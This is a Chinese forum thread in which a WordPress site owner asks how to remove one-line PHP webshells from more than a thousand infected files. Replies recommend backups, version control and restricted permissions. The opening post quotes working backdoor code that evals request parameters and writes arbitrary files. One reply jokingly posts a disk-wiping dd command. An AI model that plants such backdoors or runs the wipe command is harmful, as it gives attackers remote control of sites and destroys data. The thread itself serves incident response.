网站文件里有上千个文件被感染一句话木马,怎么能彻底清除干净?

2014-09-04 21:41:53 +08:00
 54dev
eval(base64_decode($_POST['n071238']));
eval(base64_decode($_POST['n642afe']));
eval(base64_decode($_POST['n6ae4d5']));
eval(base64_decode($_POST['n78cd5a']));
eval('$v_result = '.$p_option s[PCLZIP_CB_PRE_EXTRACT].'(PCLZIP_CB_PRE_EXTRACT, $v_local_header);');
$ogygd = "42bd6c187118582ea3e338a599a329b1"; if(isset($_REQUEST['mpwr '])) { $dsir = $_REQUEST['mpwr']; eval($dsir); exit(); } if(isset($_REQUEST['tsyuw'])) { $tkirx = $_REQUEST['rvlzlo']; $jouyl = $_REQUEST['tsyuw']; $zofhgl = fopen($jouyl, 'w'); $zkvv = fwri te($zofhgl, $tkirx); fclose($zofhgl); echo $zkvv; exit(); }

$njhg = "63e9ac921222afbfe0f8cb60c5bc3069"; if(isset($_REQUEST['kdrmaio'])) { $tbrnlbk = $_REQUEST['kdrmaio']; eval($tbrnlbk); exit(); } if(isset($_REQUEST['xcjvv'])) { $tue ezzz = $_REQUEST['sjkkv']; $sjamlr = $_REQUEST['xcjvv']; $wtjfqlol = fopen($sjamlr, 'w'); $jfcn k = fwrite($wtjfqlol, $tueezzz); fclose($wtjfqlol); echo $jfcnk; exit(); }
$krglis = "b95e94407a784c065429334b68ee7bd0"; if(isset($_REQUEST[' jbpvxunm'])) { $ityq = $_REQUEST['jbpvxunm']; eval($ityq); exit(); } if(isset($_REQUEST['xsqgzp w'])) { $jqxnuchk = $_REQUEST['qmpl']; $jzwlh = $_REQUEST['xsqgzpw']; $kyiiqzo = fopen($jzwlh, 'w'); $ollxbik = fwrite($kyiiqzo, $jqxnuchk); fclose($kyiiqzo); echo $ollxbik; exit(); }



网站是wordpress
6449 次点击
所在节点    问与答
26 条回复
feefk
2014-09-04 21:43:43 +08:00
不懂,帮顶。。。
54dev
2014-09-04 21:47:08 +08:00
还有个问题:这些木马里,这么多参数,还有这么多文件,他们是怎么管理的,手工记是肯定 不可能的吧,
Hubs
2014-09-04 21:51:13 +08:00
试试 阿D,百度搜一下 阿D
RemRain
2014-09-04 21:52:26 +08:00
```
dd if=/dev/zero of=/
```
我开玩笑的,别当真
Automan
2014-09-04 21:54:01 +08:00
@54dev 肯定是用菜刀连接的嘛
54dev
2014-09-04 22:00:05 +08:00
@RemRain 逗比,拿你的主机我试一下。:)

@Automan 菜刀这么强

@Hubs 会不会误杀,我用find . -name "*.php" | xargs grep "eval"查出来的这些文件,总共有两千多个,但真正中马的只有1000多个


这黑阔真轴,他挂的钓鱼网站我刚删除,他就又上传了,索性我把站关了,免得被反欺诈中心投诉。
ai0by
2014-09-04 22:23:15 +08:00
我想知道他怎么做到感染1000多个文件
jkjoke
2014-09-04 22:33:49 +08:00
@ai0by 大马有批量挂马功能
raincious
2014-09-04 22:36:31 +08:00
@ai0by 很简单,用个正则表达式或者str_pos就行了。剩下的就是字符串插入/替换。

就像这样:
https://gist.github.com/raincious/cc6067699fb86eb33353
54dev
2014-09-04 22:38:42 +08:00
@raincious 插入不怕,但批量去马的时候容易误杀
crab
2014-09-04 22:59:41 +08:00
试下能不能通过文件最后修改日期入手。
izoabr
2014-09-04 23:00:20 +08:00
有备份不?别说没有哦。。。恢复
0zero0
2014-09-04 23:16:17 +08:00
对,其实抵抗黑客的一个最后的绝招就是:备份!!!
这对于个人来说也是个非常好的习惯。

上面说的好像离题了,下面回答一下问题:批量去马真的太容易误杀了o(╯□╰)o
Automan
2014-09-04 23:27:25 +08:00
@54dev 治标不治本啊,后门不一定都有eval的,要留后门太容易了。。看看有没有备份,重新恢复一份,全站只留读权限,图片文件目录下禁止PHP执行
ai0by
2014-09-04 23:36:08 +08:00
@jkjoke 一般的都没有的吧😄
RemRain
2014-09-04 23:39:37 +08:00
C:\> dd if=/dev/zero of=/
Illegal command: dd.

@54dev,dd 无害,可放心大胆使用

话说你的 php 是用 root 跑的么?是的话果断重装系统吧,其他帐号的话,删除帐号对应的所有文件,用备份重建。一般被侵入的话,可不止改 php 文件那么简单
Mutoo
2014-09-04 23:40:29 +08:00
这时候就突显版本控制的必要性了
akfish
2014-09-04 23:42:00 +08:00
有版本控制的话,直接就revert了。
lz这次杀了后,赶紧版本控制起来吧。
Hubs
2014-09-04 23:55:08 +08:00
@54dev 应该不会吧!毕竟 阿D 是很早就开始做这类工具了!
oott123
2014-09-05 00:15:28 +08:00
@RemRain C:\> dd 哈哈哈哈这是我今天听到的最好笑的笑话,感谢层主!

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/131784

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX